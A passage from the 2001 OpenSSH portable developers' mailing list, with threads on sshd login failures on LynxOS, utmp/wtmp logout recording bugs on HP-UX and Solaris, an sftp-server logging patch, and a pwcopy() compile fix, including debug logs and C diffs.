Veeravalli) Date: Wed, 20 Jun 2001 16:39:33 -0400 Subject: FW: FW: behaviour of sshd in debug mode Message-ID: <7AC90049E901D511A8CA009027289AEA8EBDD6@wench> Whoever can help me... pls find attached the loggings for the openssh sessions from local(host=keg;redhat linux) to remote (host=ben;lynxos) The issue is when I run sshd in debug mode and try to logon from local, password authentication succeeds, but if I run sshd as a daemon, it fails. sshlocal.txt >>> logging at local when sshd is not run with debug option sshlocal...txt >> logging at local when sshd is run with -d -d -d option on remote sshremote..txt >> logging at remote when sshd is run with debug on Thanks for any help! -----Original Message----- From: mouring at etoh.eviladmin.org [mailto:mouring at etoh.eviladmin.org] Sent: Wednesday, June 20, 2001 2:08 PM To: Deepa Nemmili Veeravalli Subject: RE: FW: behaviour of sshd in debug mode Off hand I'm unsure. Login issues tend to stem from the following issues: 1) Incomplete PAM support 2) DES vs MD5 encryption of passwords 3) Unknown verification method. I'm leaning towards #3 right now. Since I don't have a LynxOS box to test I can not provide too much more direct help. A copy of 'sshd -d -d -d' run may help (To the OpenSSH list please so Markus can also see and give advice), but I'm not too sure at this point. - Ben On Wed, 20 Jun 2001, Deepa Nemmili Veeravalli wrote: > Lynx uses DES ... > > -----Original Message----- > From: mouring at etoh.eviladmin.org [mailto:mouring at etoh.eviladmin.org] > Sent: Wednesday, June 20, 2001 11:33 AM > To: Deepa Nemmili Veeravalli > Subject: RE: FW: behaviour of sshd in debug mode > > > > I know very little about LynxOS. Does it use MD5 or DES password > encryption? > > - Ben > > On Wed, 20 Jun 2001, Deepa Nemmili Veeravalli wrote: > > > Remote host is a LynxOS Power-PC machine and Local is RedHat Linux.I had > > ported the openssh-2.9p1 to LynxOs and installed in the same and used > > openssh coming by default with linux on local. > > > > And I did a ./configure powerpc-unknown-lynxos > > > > Do Let me know if more info is needed .. > > Thanks,Deepa. > > > > -----Original Message----- > > From: mouring at etoh.eviladmin.org [mailto:mouring at etoh.eviladmin.org] > > Sent: Wednesday, June 20, 2001 11:01 AM > > To: Deepa Nemmili Veeravalli > > Subject: Re: FW: behaviour of sshd in debug mode > > > > > > > > Just like in your original email you did not state what OS the server > > was running nor your ./configure line.. therefor I can't help. I can > > only assume your on Slackware Linux and you did not read the > > http://www.openbsd.com/faq.html or you are on Redhat and you forgot to > > put in the /etc/pam.d/sshd after you compiled in PAM support. > > > > - Ben > > > > On Wed, 20 Jun 2001, Deepa Nemmili Veeravalli wrote: > > > > > Hi Mouring, > > > Could you help me with a clue to this issue? > > > Thanks,Deepa > > > > > > > > > > -----Original Message----- > > > > From: Deepa Nemmili Veeravalli > > > > Sent: Tuesday, June 19, 2001 8:22 PM > > > > To: openssh-unix-dev at mindrot.org > > > > Subject: behaviour of sshd in debug mode > > > > > > > > Hi, > > > > I tried searching openssh docs and the archives but could not get > much > > > > info on this problem i am facing with openssh. > > > > > > > > When i run the sshd on the remote machine(OpenSSH_2.9p1) in debug mode > > and > > > > try to login from local host(OpenSSH_2.3.0), I get into the remote > host > > > > with public key authnetication.But if i run sshd without debug mode, I > > am > > > > prompted for passwrod authentication and eventhough i give the correct > > > > password I am refused connection. > > > > > > > > Pls can someone tell me if i am missing something... > > > > > > > > Thanks for any help, > > > > Deepa. > > > > > > > > > > > > > > > > > > -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: sshlocal.txt Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010620/f0774038/attachment.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: sshlocalwithsshRemoteInDebug.txt Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010620/f0774038/attachment-0001.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: sshremoteindebug.txt Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010620/f0774038/attachment-0002.txt From markus.friedl at informatik.uni-erlangen.de Thu Jun 21 13:43:26 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 21 Jun 2001 05:43:26 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010620180845.A18250@ws01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Wed, Jun 20, 2001 at 06:08:45PM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> Message-ID: <20010621054326.A17059@folly> On Wed, Jun 20, 2001 at 06:08:45PM +0200, Lutz Jaenicke wrote: > On Wed, Jun 20, 2001 at 03:49:26PM +0200, Markus Friedl wrote: > > you can try this patch (against -current). > > > > the patch does a little bit more, but all you > > need is this: > > + channel_free_all(); > > + > > signal(SIGCHLD, SIG_DFL); > > while ((pid = waitpid(-1, &status, WNOHANG)) > 0) > > session_close_by_pid(pid, status); > > - channel_stop_listening(); > > > > in serverloop.c and an implementation for channel_free_all(). > > It does not work. > > The effect is still the same. > A sshd -d yields: > Connection closed by remote host. > debug1: closing all channels > debug1: channel_free: channel 0: server-session, nchannels 1 > debug1: channel_free: channel 0: dettaching channel user > debug1: session_by_channel: session 0 channel 0 > debug1: session_close_by_channel: channel 0 kill 18299 > Closing connection to 141.43.132.151 > > Following the code in session.c, session_close_by_channel with > s->pid != 0 will "notify child, delay session cleanup". > However, session_close() is never called (it would be seen due to > debug("session_close: session %d pid %d", s->self, s->pid)) > and therefore it seems that session_pty_cleanup(s) (finally calling > the record_logout() function) is never called. i see, there are more changes in current. could you please try current? From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 21 18:26:00 2001 From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 21 Jun 2001 10:26:00 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010621054326.A17059@folly>; from markus.friedl@informatik.uni-erlangen.de on Thu, Jun 21, 2001 at 05:43:26AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> Message-ID: <20010621102600.B20678@ws01.aet.tu-cottbus.de> On Thu, Jun 21, 2001 at 05:43:26AM +0200, Markus Friedl wrote: > On Wed, Jun 20, 2001 at 06:08:45PM +0200, Lutz Jaenicke wrote: > > Following the code in session.c, session_close_by_channel with > > s->pid != 0 will "notify child, delay session cleanup". > > However, session_close() is never called (it would be seen due to > > debug("session_close: session %d pid %d", s->self, s->pid)) > > and therefore it seems that session_pty_cleanup(s) (finally calling > > the record_logout() function) is never called. > > i see, there are more changes in current. > > could you please try current? ??? I have applied the patch to the latest version I got from CVS (:pserver:cvs at bass.directhit.com:/cvs ...), the latest ChangeLog being: 20010615 - (stevesk) don't set SA_RESTART and set SIGCHLD to SIG_DFL around grantpt(). - (stevesk) update TODO: STREAMS pty systems don't call vhangup() now 20010614 Is there another source I should try? Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From jason at dour.org Thu Jun 21 22:17:00 2001 From: jason at dour.org (Jason A . Dour) Date: Thu, 21 Jun 2001 08:17:00 -0400 Subject: SFTP Logging Redux. In-Reply-To: ; from rjmooney@aboveground.cx on Wed, Jun 20, 2001 at 04:05:52PM -0400 References: <20010620091208.A18950@dour.org> Message-ID: <20010621081700.A21713@dour.org> On Wed, Jun 20, 2001 at 04:05:52PM -0400, Robert Mooney wrote: > It looks like you're logging the requested action, not the result. For > instance: True. I was mainly worried about logging in general on my first pass through the code. So I simply logged anywhere there was a TRACE. Not the greatest...but it met my extremely short time-frame. > Unless I'm missing something about the functionality of log(), I would > expect it to come after the open(), and include information as to > whether or not the action actually succeeded. True. I'm working on a patch today for this fucntionality. > Also, a switch to a) turn on logging, and b) set the verbosity of the > logging would be cool. Compile-time or execution time? Ideally execution-time, in my opinion, but that complicates the coding. Compile time reduces complexity and makes it feasible to be there in the next patch. > In general, I think it's easier for a developer to turn his back on > your patch if it's adding functionality without requiring the user > request it explicitly. Noted. Thanks! I'll post the fix as soon as I have it. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ From tuneki at pb.jp.nec.com Thu Jun 21 22:59:02 2001 From: tuneki at pb.jp.nec.com (KITAZIMA Tuneki) Date: Thu, 21 Jun 2001 21:59:02 +0900 Subject: Output of last command is strange on Solaris 2.6/8 (OpenSSH 2.9p2) Message-ID: <20010621215902G.tuneki-k@ksp.nis.nec.co.jp> Hi. OS: Solaris 2.6 and 8 OpenSSH: 2.9p2 I found a bug. Output of last command becomes strange in case of "UseLogin yes" in sshd_config. # Two entries are output with one time of login. strange case: % last fuga pts/3 bar.foo.co.jp Thu Jun 21 12:45 - 20:02 (07:16) fuga pts/3 bar.foo.co.jp Thu Jan 1 09:00 - 12:45 (11494+03:45) hoge pts/2 foo.bar.co.jp Thu Jun 21 11:12 - 15:30 (04:17) hoge pts/2 foo.bar.co.jp Thu Jan 1 09:00 - 11:12 (11494+02:12) .... When comment on it with wtmp_write_entry and wtmpx_write_entry of login_utmp_only function, last output an usual entry. % last fuga pts/3 bar.foo.co.jp Thu Jun 21 12:45 - 20:02 (07:16) hoge pts/2 foo.bar.co.jp Thu Jun 21 11:12 - 15:30 (04:17) ... --- openssh-2.9p2.orig/loginrec.c Wed May 9 05:34:33 2001 +++ openssh-2.9p2/loginrec.c Thu Jun 21 20:23:58 2001 @@ -451,15 +451,19 @@ # ifdef USE_UTMP utmp_write_entry(li); # endif +#ifndef __sun # ifdef USE_WTMP wtmp_write_entry(li); # endif +#endif # ifdef USE_UTMPX utmpx_write_entry(li); # endif +#ifndef __sun # ifdef USE_WTMPX wtmpx_write_entry(li); # endif +#endif return 0; } #endif If there is a right method of this case, please teach it. -- KITAZIMA, Tuneki NEC Informatec Systems,Ltd. tuneki at pb.jp.nec.com Shared Infrastructure and Services Division From mouring at etoh.eviladmin.org Thu Jun 21 22:54:38 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Thu, 21 Jun 2001 07:54:38 -0500 (CDT) Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010621102600.B20678@ws01.aet.tu-cottbus.de> Message-ID: I just updated it as of last night.. There is around 6 new patches including the patch Markus gave. - Ben On Thu, 21 Jun 2001, Lutz Jaenicke wrote: > On Thu, Jun 21, 2001 at 05:43:26AM +0200, Markus Friedl wrote: > > On Wed, Jun 20, 2001 at 06:08:45PM +0200, Lutz Jaenicke wrote: > > > Following the code in session.c, session_close_by_channel with > > > s->pid != 0 will "notify child, delay session cleanup". > > > However, session_close() is never called (it would be seen due to > > > debug("session_close: session %d pid %d", s->self, s->pid)) > > > and therefore it seems that session_pty_cleanup(s) (finally calling > > > the record_logout() function) is never called. > > > > i see, there are more changes in current. > > > > could you please try current? > > ??? > > I have applied the patch to the latest version I got from CVS > (:pserver:cvs at bass.directhit.com:/cvs ...), the latest ChangeLog > being: > 20010615 > - (stevesk) don't set SA_RESTART and set SIGCHLD to SIG_DFL > around grantpt(). > - (stevesk) update TODO: STREAMS pty systems don't call vhangup() now > > 20010614 > > Is there another source I should try? > > Best regards, > Lutz > -- > Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE > BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ > Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 > Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 > From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 21 23:12:15 2001 From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 21 Jun 2001 15:12:15 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010621054326.A17059@folly>; from markus.friedl@informatik.uni-erlangen.de on Thu, Jun 21, 2001 at 05:43:26AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> Message-ID: <20010621151214.A27941@ws01.aet.tu-cottbus.de> On Thu, Jun 21, 2001 at 05:43:26AM +0200, Markus Friedl wrote: > On Wed, Jun 20, 2001 at 06:08:45PM +0200, Lutz Jaenicke wrote: > > Following the code in session.c, session_close_by_channel with > > s->pid != 0 will "notify child, delay session cleanup". > > However, session_close() is never called (it would be seen due to > > debug("session_close: session %d pid %d", s->self, s->pid)) > > and therefore it seems that session_pty_cleanup(s) (finally calling > > the record_logout() function) is never called. > > i see, there are more changes in current. > > could you please try current? Ok, the CVS mirror has now been updated including the patch :-) It does not work, though :-( The "famous last words" are: debug1: fd 7 setting O_NONBLOCK debug2: fd 3 is O_NONBLOCK debug2: callback done Connection closed by remote host. debug1: channel_free: channel 0: server-session, nchannels 1 debug3: channel_free: status: The following connections are open: #0 server-session (t4 r0 i1/0 o16/0 fd 7/3) debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: session_close_by_channel: channel 0 kill 28025 debug3: channel_close_fds: channel 0: r 7 w 3 e -1 Closing connection to 127.0.0.1 When the connection is closed, the child (in this case 27921) will be killed from session_close_by_channel() with either TERM or HUP. However, session_close(), which is responsible for recording the logout, is not called. Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 21 23:14:37 2001 From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 21 Jun 2001 15:14:37 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010621151214.A27941@ws01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Thu, Jun 21, 2001 at 03:12:15PM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> <20010621151214.A27941@ws01.aet.tu-cottbus.de> Message-ID: <20010621151436.B27959@ws01.aet.tu-cottbus.de> On Thu, Jun 21, 2001 at 03:12:15PM +0200, Lutz Jaenicke wrote: > Ok, the CVS mirror has now been updated including the patch :-) > It does not work, though :-( > The "famous last words" are: > debug1: fd 7 setting O_NONBLOCK > debug2: fd 3 is O_NONBLOCK > debug2: callback done > Connection closed by remote host. > debug1: channel_free: channel 0: server-session, nchannels 1 > debug3: channel_free: status: The following connections are open: > #0 server-session (t4 r0 i1/0 o16/0 fd 7/3) > > debug1: channel_free: channel 0: dettaching channel user > debug1: session_by_channel: session 0 channel 0 > debug1: session_close_by_channel: channel 0 kill 28025 > debug3: channel_close_fds: channel 0: r 7 w 3 e -1 > Closing connection to 127.0.0.1 > > When the connection is closed, the child (in this case 27921) will be ^^^^^ (This was an old PID from another example, sorry. Read this: 28025) > killed from session_close_by_channel() with either TERM or HUP. > However, session_close(), which is responsible for recording the logout, > is not called. > > Best regards, > Lutz > -- > Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE > BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ > Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 > Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From jason at dour.org Fri Jun 22 00:59:46 2001 From: jason at dour.org (Jason A . Dour) Date: Thu, 21 Jun 2001 10:59:46 -0400 Subject: SFTP Logging Redux. In-Reply-To: ; from rjmooney@aboveground.cx on Wed, Jun 20, 2001 at 04:05:52PM -0400 References: <20010620091208.A18950@dour.org> Message-ID: <20010621105946.D21713@dour.org> On Wed, Jun 20, 2001 at 04:05:52PM -0400, Robert Mooney wrote: > Unless I'm missing something about the functionality of log(), I would > expect it to come after the open(), and include information as to > whether or not the action actually succeeded. Done. All actions are trapped for errors and errors are reported into the log() along with successes. > Also, a switch to a) turn on logging, and b) set the verbosity of the > logging would be cool. A) SSHD always logs. Default level is AUTH.INFO unless otherwise specified. Since SSHD always logs, I see no reason why its subsystems shouldn't automatically log as well. B) I'm not certain how useful part B would be. Are you saying you still want it logged but you want to alter the log-string based on a verbosity setting (terse versus verbose)? Or do you want the LOGLEVEL of the logging to be user-defined? > In general, I think it's easier for a developer to turn his back on > your patch if it's adding functionality without requiring the user > request it explicitly. Agreed. However, as I stated above, this puts SFTP loggin in line with SSHD logging. I don't see why we should turn it off by default, much less HOW given that use of the log() function requires logging to be active. > Nice idea though, I would like to see something similar committed. Latest diff is attached. Comments? Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ -------------- next part -------------- --- sftp-server.c.orig Tue Jun 19 16:32:45 2001 +++ sftp-server.c Thu Jun 21 10:55:10 2001 @@ -52,8 +52,14 @@ /* Version of client */ int version; -/* portable attibutes, etc. */ +/* User information. */ +#define CUNAME cuname ? cuname : "UNKNOWN" +struct passwd *upw; +uid_t cuid; +pid_t ppid; +char *cuname; +/* portable attibutes, etc. */ typedef struct Stat Stat; struct Stat { @@ -93,6 +99,23 @@ return ret; } +char * +status_to_logstr(int status) +{ + switch (status) { + case SSH2_FX_OK: + return "Successful"; + case SSH2_FX_NO_SUCH_FILE: + return "No such file or directory"; + case SSH2_FX_PERMISSION_DENIED: + return "Permission denied"; + case SSH2_FX_BAD_MESSAGE: + return "Bad message"; + default: + return "Unknown error"; + } +} + int flags_from_portable(int pflags) { @@ -115,6 +138,28 @@ return flags; } +void +sflags_from_portable(char *psflags, int pflags) +{ + if (pflags & SSH2_FXF_READ) + *psflags = 'r'; + psflags++; + if (pflags & SSH2_FXF_WRITE) + *psflags = 'w'; + psflags++; + if (pflags & SSH2_FXF_APPEND) + *psflags = 'a'; + psflags++; + if (pflags & SSH2_FXF_CREAT) + *psflags = 'c'; + psflags++; + if (pflags & SSH2_FXF_TRUNC) + *psflags = 't'; + psflags++; + if (pflags & SSH2_FXF_EXCL) + *psflags = 'e'; +} + Attrib * get_attrib(void) { @@ -370,6 +415,7 @@ version = buffer_get_int(&iqueue); TRACE("client version %d", version); + log("(%d/%d/%s) Client version %d", ppid, cuid, CUNAME, version); buffer_init(&msg); buffer_put_char(&msg, SSH2_FXP_VERSION); buffer_put_int(&msg, SSH2_FILEXFER_VERSION); @@ -382,7 +428,7 @@ { u_int32_t id, pflags; Attrib *a; - char *name; + char *name, sflags[7] = "------"; int handle, fd, flags, mode, status = SSH2_FX_FAILURE; id = get_int(); @@ -390,18 +436,22 @@ pflags = get_int(); /* portable flags */ a = get_attrib(); flags = flags_from_portable(pflags); + sflags_from_portable(&sflags[0], pflags); mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a->perm : 0666; TRACE("open id %d name %s flags %d mode 0%o", id, name, pflags, mode); fd = open(name, flags, mode); if (fd < 0) { status = errno_to_portable(errno); + log("(%d/%d/%s) File/Dir open failed - %s: %s (%s,%04o)", ppid, cuid, CUNAME, status_to_logstr(status), name, sflags, mode); } else { handle = handle_new(HANDLE_FILE, xstrdup(name), fd, NULL); if (handle < 0) { close(fd); + log("(%d/%d/%s) File/Dir open failed - Could not allocate SFTP handle: %s (%s,%04o)", ppid, cuid, CUNAME, name, sflags, mode); } else { send_handle(id, handle); status = SSH2_FX_OK; + log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)", ppid, cuid, CUNAME, name, sflags, mode); } } if (status != SSH2_FX_OK) @@ -591,18 +641,27 @@ TRACE("setstat id %d name %s", id, name); if (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) { ret = chmod(name, a->perm & 0777); - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir permissions failed - %s: %s (%04o).", ppid, cuid, CUNAME, status_to_logstr(status), name, a->perm & 0777); + } else + log("(%d/%d/%s) Set file/dir permissions: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); } if (a->flags & SSH2_FILEXFER_ATTR_ACMODTIME) { ret = utimes(name, attrib_to_tv(a)); - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir times failed - %s: %s.", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else + log("(%d/%d/%s) Set file/dir times: %s.", ppid, cuid, CUNAME, name); } if (a->flags & SSH2_FILEXFER_ATTR_UIDGID) { ret = chown(name, a->uid, a->gid); - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir owner/group failed - %s: %s (%d/%d).", ppid, cuid, CUNAME, status_to_logstr(status), name, a->uid, a->gid); + } else + log("(%d/%d/%s) Set file/dir owner/group: %s (%d/%d).", ppid, cuid, CUNAME, name, a->uid, a->gid); } send_status(id, status); xfree(name); @@ -632,8 +691,11 @@ #else ret = chmod(name, a->perm & 0777); #endif - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir permissions failed - %s: %s (%04o).", ppid, cuid, CUNAME, status_to_logstr(status), name, a->perm & 0777); + } else + log("(%d/%d/%s) Set file/dir permissions: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); } if (a->flags & SSH2_FILEXFER_ATTR_ACMODTIME) { #ifdef HAVE_FUTIMES @@ -641,8 +703,11 @@ #else ret = utimes(name, attrib_to_tv(a)); #endif - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir times failed - %s: %s.", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else + log("(%d/%d/%s) Set file/dir times: %s.", ppid, cuid, CUNAME, name); } if (a->flags & SSH2_FILEXFER_ATTR_UIDGID) { #ifdef HAVE_FCHOWN @@ -650,8 +715,11 @@ #else ret = chown(name, a->uid, a->gid); #endif - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir owner/group failed - %s: %s (%d/%d).", ppid, cuid, CUNAME, status_to_logstr(status), name, a->uid, a->gid); + } else + log("(%d/%d/%s) Set file/dir owner/group: %s (%d/%d).", ppid, cuid, CUNAME, name, a->uid, a->gid); } } send_status(id, status); @@ -791,7 +859,13 @@ name = get_string(NULL); TRACE("remove id %d name %s", id, name); ret = unlink(name); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) File deletion failed - %s: %s", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) File deleted: %s", ppid, cuid, CUNAME, name); + } send_status(id, status); xfree(name); } @@ -811,7 +885,13 @@ a->perm & 0777 : 0777; TRACE("mkdir id %d name %s mode 0%o", id, name, mode); ret = mkdir(name, mode); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) Directory creation failed - %s: %s", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) Directory created: %s", ppid, cuid, CUNAME, name); + } send_status(id, status); xfree(name); } @@ -827,7 +907,13 @@ name = get_string(NULL); TRACE("rmdir id %d name %s", id, name); ret = rmdir(name); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) Directory deletion failed - %s: %s", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) Directory deleted: %s", ppid, cuid, CUNAME, name); + } send_status(id, status); xfree(name); } @@ -872,8 +958,15 @@ /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = rename(oldpath, newpath); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; - } + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) File/Dir renaming failed - %s: %s -> %s", ppid, cuid, CUNAME, status_to_logstr(status), oldpath, newpath); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) File/Dir renamed: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); + } + } else + log("(%d/%d/%s) File/Dir renaming failed - Target name exists: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); send_status(id, status); xfree(oldpath); xfree(newpath); @@ -914,11 +1007,19 @@ oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("symlink id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) Symbolic link created: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = symlink(oldpath, newpath); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; - } + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) Symbolic link creation failed - %s: %s -> %s", ppid, cuid, CUNAME, status_to_logstr(status), oldpath, newpath); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) Symbolic link created: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); + } + } else + log("(%d/%d/%s) Symbolic link creation failed - Target name exists: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); send_status(id, status); xfree(oldpath); xfree(newpath); @@ -932,6 +1033,7 @@ id = get_int(); request = get_string(NULL); + log("(%d/%d/%s) Extended operation attempted - Ignoring.", ppid, cuid, CUNAME); send_status(id, SSH2_FX_OP_UNSUPPORTED); /* MUST */ xfree(request); } @@ -951,6 +1053,7 @@ msg_len = GET_32BIT(cp); if (msg_len > 256 * 1024) { error("bad message "); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Bad Message"); exit(11); } if (buffer_len(&iqueue) < msg_len + 4) @@ -1036,10 +1139,27 @@ __progname = get_progname(av[0]); handle_init(); + /* Initialize the username of the user running the process. */ + cuid = getuid(); + if ((upw = getpwuid(cuid)) == NULL) { + cuname = NULL; + } else { + cuname = upw->pw_name; + } + + /* Initialize the parent process ID. */ + ppid = getppid(); + + /* Initialize the logfile, loglevel dependent on DEBUG compile-time setting. */ #ifdef DEBUG_SFTP_SERVER log_init("sftp-server", SYSLOG_LEVEL_DEBUG1, SYSLOG_FACILITY_AUTH, 0); +#else + log_init("sftp-server", SYSLOG_LEVEL_INFO, SYSLOG_FACILITY_AUTH, 0); #endif + /* Log session start. */ + log("(%d/%d/%s) SFTP session started.", ppid, cuid, CUNAME); + in = dup(STDIN_FILENO); out = dup(STDOUT_FILENO); @@ -1073,6 +1193,7 @@ if (select(max+1, rset, wset, NULL, NULL) < 0) { if (errno == EINTR) continue; + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Select Error"); exit(2); } @@ -1082,9 +1203,11 @@ len = read(in, buf, sizeof buf); if (len == 0) { debug("read eof"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "EOF"); exit(0); } else if (len < 0) { error("read error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Read Error"); exit(1); } else { buffer_append(&iqueue, buf, len); @@ -1095,6 +1218,7 @@ len = write(out, buffer_ptr(&oqueue), olen); if (len < 0) { error("write error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Write Error"); exit(1); } else { buffer_consume(&oqueue, len); From dwd at bell-labs.com Fri Jun 22 02:51:12 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Thu, 21 Jun 2001 11:51:12 -0500 Subject: pw_expire/pw_change in current portable openssh CVS bombs Message-ID: <20010621115112.A25121@lucent.com> The references to pw_expire and pw_change in pwcopy() in misc.c cause compilation errors at least on solaris. How about doing a memcpy of the whole structure and only explicitly setting those that need xstrdup? That would work on openbsd and everywhere else. - Dave Dykstra --- misc.c.O Thu Jun 21 11:35:28 2001 +++ misc.c Thu Jun 21 11:36:09 2001 @@ -125,14 +125,10 @@ { struct passwd *copy = xmalloc(sizeof(*copy)); - memset(copy, 0, sizeof(*copy)); + memcpy(copy, pw, sizeof(*copy)); copy->pw_name = xstrdup(pw->pw_name); copy->pw_passwd = xstrdup(pw->pw_passwd); copy->pw_gecos = xstrdup(pw->pw_gecos); - copy->pw_uid = pw->pw_uid; - copy->pw_gid = pw->pw_gid; - copy->pw_expire = pw->pw_expire; - copy->pw_change = pw->pw_change; #ifdef HAVE_PW_CLASS_IN_PASSWD copy->pw_class = xstrdup(pw->pw_class); #endif From dwd at bell-labs.com Fri Jun 22 04:08:07 2001 From: 